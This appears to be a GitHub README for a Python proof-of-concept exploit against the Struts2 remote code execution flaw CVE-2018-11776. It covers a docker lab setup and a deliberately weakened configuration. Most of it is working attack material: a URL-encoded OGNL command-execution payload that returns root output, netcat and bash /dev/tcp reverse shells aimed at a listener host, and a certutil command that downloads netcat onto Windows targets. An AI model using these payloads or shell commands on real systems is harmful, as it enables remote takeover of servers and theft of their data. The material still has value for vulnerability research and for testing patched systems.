CVE-2018-11776-Python-PoC

hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

Working Python test and PoC for CVE-2018-11776, originally appearing on; https://github.com/hook-s3c/CVE-2018-11776-Python-PoC

What's going on?

Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.

Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.

Default configuration is not vulnerable, but if misconfigured... F.

Set up your docker instance

exploit will work fine with the docker container build for cve-2017-5638 (struts2-showcase-2.3.12)

$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638

Set up your weakened configuration

$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml 

add the configuration below;

<action name="help">
            <result type="redirectAction">
                    <param name="actionName">date.action</param>
            </result>
    </action>

and also;

<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

restart your tomcat and/or container

$ /usr/local/tomcat/bin/shutdown.sh

Verify that target is vulnerable

test the url to see if a redirect and evaluation occurs;

http://0.0.0.0:32771/${2+2}/help.action > http://0.0.0.0:32771/4/date.action

with the test script;

$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!

Execute commands PoC

$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action



uid=0(root) gid=0(root) groups=0(root)

Reverse shell

get your box ready to accept the reverse shell;

$ netcat -lvp 31337

run the script;

# you'll want to install netcat
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'

# now pop that shell 
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'

replace 32771 with your exposed container port

Updated method via Bash, forward-slashes now supported.

$ netcat -lvp 31337

$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"

Windows reverse shell (untested)

# grab netcat binary
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools

$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'

# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 –e cmd.exe'

---

Debug hell (notes)

All requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.

• https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7
• http://engineering.widen.com/blog/tomcat-slashes/

With this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.

Update

Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).

Mitigation

Patch your Struts, or simply don't use it.

I guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)

Credit

Thanks to ;

• Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)
• piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)
• xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)
• jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)
• @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) code now finally supports windows and bash reverse shell

Greetz

shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces